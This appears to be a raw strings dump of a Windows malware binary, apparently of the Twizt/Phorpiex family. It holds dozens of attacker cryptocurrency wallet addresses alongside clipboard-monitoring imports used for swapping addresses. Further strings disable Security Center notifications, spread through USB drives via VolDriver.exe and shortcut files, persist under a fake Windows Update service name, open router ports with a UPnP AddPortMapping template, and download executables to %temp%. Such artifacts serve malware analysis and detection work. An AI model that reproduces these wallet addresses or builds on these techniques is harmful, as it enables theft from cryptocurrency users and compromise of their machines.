!This program cannot be run in DOS mode.
`.rdata
@.data
|$HVWRR
t$$;L$D
D$ WSP
D$ PSQVU
D$(USP
D$(QRSVP
T$0PQWR
L$(RPVWQ
T$(PQVWR
8vm_^]2
0vM_^]2
iv-_^]2
SUUVWUj
L$(PQh
u89l$ u
L$ PQh
SUVWj,
QSUVWh
D$ QRP
D$0PSU
|$@3px
3|$ 3t$
3t$$3|$(3
3t$,3|$03
\$d3t$d
$SUVWh
SUUVWUh
VVPSVV
L$$PQR
T$,VWWj
SWWWWW
D$ [_^]
D$ [_^]
T$,VWWj
SWWWWW
>ilciu1
>ilciuk
L$4QRP
;PCOIu^
>ilciu
F(;F$s
VC20XC00U
;t$(v(
UQPXY]Y[
F0123456789abcdef
13537267282679196401L
14T6qgnx6kQrxgr6asZR8UwvSYuLWUq3AHEUyArFbropQRWp
12ZcTiGZFWydqY4rDW6FbF1ArsBbdNaPxz
3P99cyMypyaBthhNh1VLrtF7gjsHNxooth5
3NNJW9YnKichMXTVgAhrsD65veUBCfGC9m
qps3rmvkxc2qe0dxlffnxe6jvv90xtp8tcxquxva6v
XkTJhYh432bGU2dMScEWmNLfyNTun3n52p
DMfPdibKCp79N5sLqsLkqx7W7gyzS8dhK6
0xEa375AfbDa5e11af6F93932ef2dcDe2Cf38768Dd
LhqqjWGpEEKDnZZVozMqYVax9zAzjQPJMW
r3qS691ECDBqnCAa2Xq26HF55R38pyd2SU
TMumxbBnZn723FeqRnjZUbfvVvvmNaEyEY
t1J1JV7W2DgMbJCmzv3DKq69erCQ9sM7J8G
tz1MQTA4y7zjDP8E3f7JxJpqA768QvhkQtwQ
hx76ca924ed3a86365aa684755d07ff587399a44a3
QQyZHrgfAZUm6bqf19u3TZRfLU1szkWdAK
RWGY1zEN78ivFTZiMtiLLXYugjUM2Ezgdn
NDV3Q755N5RLBJIHD7O2MDQLHF7BGY7C5UFHJQJD
Aa6J2zX3FmXqZ1Vr6KB7SHEJeDQgZ9L1m9
SW7RcT7KzjDRZUeo33ULvuvgnk1vsfRu9h
zs1gdxkmsegruyeu72ehpfwgshmcup4sqxm7kafju9r7xjcfww8vlg7ar9rqraxmjhr9rdn2hj9v7w
zil1ks8wccts9uum532l6mt7zfn7v3grplu5plc7rd
s1QvSmGpRS7hxnjjfLvCkeDmy3MprJkpWBe
bitcoincash:qps3rmvkxc2qe0dxlffnxe6jvv90xtp8tcxquxva6v
cosmos18uv6asl0trdgeu0gajph8amh30qskjfeu7xsxf
46JBkCw1vWw2torA5cF6WwdPsjc4EziJE62PHWBKqkLmXVonQjSM5jk5zp1QfSjj2wPjzoLU64qGReNNouP2LLKBMJAZgbr
addr1q82kgwmvcs3lcfaws5rq30cq94ek9nzqygcfj2a6045hpg8yjrm9xsu92x0lv30wldh80xqwtmxrc3jfetrzvnmstchq00s0sh
FWjKuczvp1fBH95y6c5j3koVX2TZDVR3V9
GB47TTMWVEURE5VW5NN56QFDW7X2OOSXKLL6KJIB4FQ3YMRUZXXE7P7W
GgY5yz2QmGk9jtk6WZ9dTYjt4oQumDpQS2
bnb1ssq338y72jd2l0h53ujc8hn8ef9axa2d372gga
band17rdtnrylr8dlt88qpzqp8j588h5w2qnclf764u
bc1q6rzlelsxd9xadajkjwqdwr72rl9ll7g29yxzqr
U30212907
E30940134
B30912949
Phttp://
SOFTWARE\Microsoft\Security Center
FirewallOverride
FirewallDisableNotify
AntiSpywareOverride
AntiVirusOverride
AntiVirusDisableNotify
UpdatesOverride
UpdatesDisableNotify
SOFTWARE\Microsoft\Security Center\Svc
swww.update.microsoft.com
twizt)
HTTP/1.1 200 OK
LOCATION:
239.255.255.250
M-SEARCH * HTTP/1.1
ST:urn:schemas-upnp-org:device:InternetGatewayDevice:1
Man:"ssdp:discover"
HOST: 239.255.255.250:1900
Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)
Content-Type: text/xml; charset="utf-8"
Connection: Close
Cache-Control: no-cache
Pragma: no-cache
<?xml version="1.0"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost></NewRemoteHost>
<NewExternalPort>%d</NewExternalPort>
<NewProtocol>%s</NewProtocol>
<NewInternalPort>%d</NewInternalPort>
<NewInternalClient>%s</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewPortMappingDescription></NewPortMappingDescription>
<NewLeaseDuration>0</NewLeaseDuration>
</m:AddPortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
WS2_32.dll
StrStrW
PathFileExistsW
StrCmpNW
PathMatchSpecW
StrCpyNW
PathFindFileNameW
StrStrIA
StrChrA
StrCmpNIA
SHLWAPI.dll
InternetConnectA
InternetCrackUrlA
InternetReadFile
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
InternetOpenA
InternetCloseHandle
InternetOpenW
InternetOpenUrlW
WININET.dll
isalpha
isdigit
strstr
memmove
NtQuerySystemTime
RtlTimeToSecondsSince1980
mbstowcs
ntdll.dll
_vscprintf
msvcrt.dll
lstrlenA
GlobalLock
GetModuleHandleW
GetTickCount
GlobalAlloc
lstrcpynW
ExitThread
MultiByteToWideChar
lstrlenW
GlobalUnlock
GetFileSize
MapViewOfFile
UnmapViewOfFile
WriteFile
InitializeCriticalSection
LeaveCriticalSection
CreateFileW
FlushFileBuffers
EnterCriticalSection
CreateFileMappingW
CloseHandle
FindFirstFileW
GetDriveTypeW
MoveFileExW
CreateDirectoryW
GetLogicalDrives
CopyFileW
GetModuleFileNameW
lstrcmpW
FindClose
RemoveDirectoryW
QueryDosDeviceW
lstrcmpiW
FindNextFileW
GetDiskFreeSpaceExW
DeleteFileW
lstrcpyW
SetFileAttributesW
GetVolumeInformationW
ExitProcess
CreateEventA
GetLastError
CreateMutexA
CreateThread
ExpandEnvironmentStringsW
HeapReAlloc
HeapAlloc
HeapFree
HeapCreate
HeapValidate
GetProcessHeaps
HeapSetInformation
GetCurrentProcessId
InterlockedDecrement
WaitForSingleObject
InterlockedExchange
InterlockedIncrement
InterlockedExchangeAdd
GetCurrentThread
SetThreadPriority
GetThreadPriority
DeleteCriticalSection
CreateProcessW
KERNEL32.dll
SetClipboardViewer
SetClipboardData
OpenClipboard
DispatchMessageA
CreateWindowExW
RegisterRawInputDevices
DefWindowProcA
SetWindowLongW
ChangeClipboardChain
EmptyClipboard
GetClipboardData
GetWindowLongW
RegisterClassExW
TranslateMessage
wsprintfW
SendMessageA
IsClipboardFormatAvailable
CloseClipboard
GetMessageA
wvsprintfA
USER32.dll
RegQueryValueExW
RegOpenKeyExW
RegCloseKey
RegSetValueExA
RegOpenKeyExA
RegSetValueExW
CryptAcquireContextW
CryptReleaseContext
CryptGenRandom
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
CoCreateInstance
CoInitialize
CoUninitialize
CoInitializeEx
ole32.dll
OLEAUT32.dll
WSAWaitForMultipleEvents
WSASocketA
WSACreateEvent
WSAGetOverlappedResult
WSAEventSelect
WSAEnumNetworkEvents
WSASend
WSARecv
WSACloseEvent
SetEvent
CreateIoCompletionPort
GetQueuedCompletionStatus
PostQueuedCompletionStatus
GetSystemInfo
memset
memcpy
_chkstk
RtlUnwind
NtQueryVirtualMemory
jjjjjj
bitcoincash:
cosmos
ebitcoincash
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
NoDrives
%s\VolDriver.exe
%windir%\explorer.exe
%s.lnk
%s\%s\VolDriver.exe
shell32.dll
*.inf*.scr
Thumbs.db
$RECYCLE.BIN
desktop.ini
System Volume Information
%s\%s\%s
(%dGB)
Unnamed volume
Microsoft Corporation
winupdsvcs.exe
Microsoft Windows Update Service
VolDriver.exe
%s:Zone.Identifier
%userprofile%
Software\Microsoft\Windows\CurrentVersion\Run\
%s\nodescfg.dat
%s\cmdcfg.dat
service
serviceType
serviceList
device
deviceType
deviceList
urn:schemas-upnp-org:device:InternetGatewayDevice:1
urn:schemas-upnp-org:device:WANDevice:1
urn:schemas-upnp-org:device:WANConnectionDevice:1
urn:schemas-upnp-org:service:WANIPConnection:1
urn:schemas-upnp-org:service:WANPPPConnection:1
controlURL
URLBase
"%temp%
%s\%d%d.exe
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36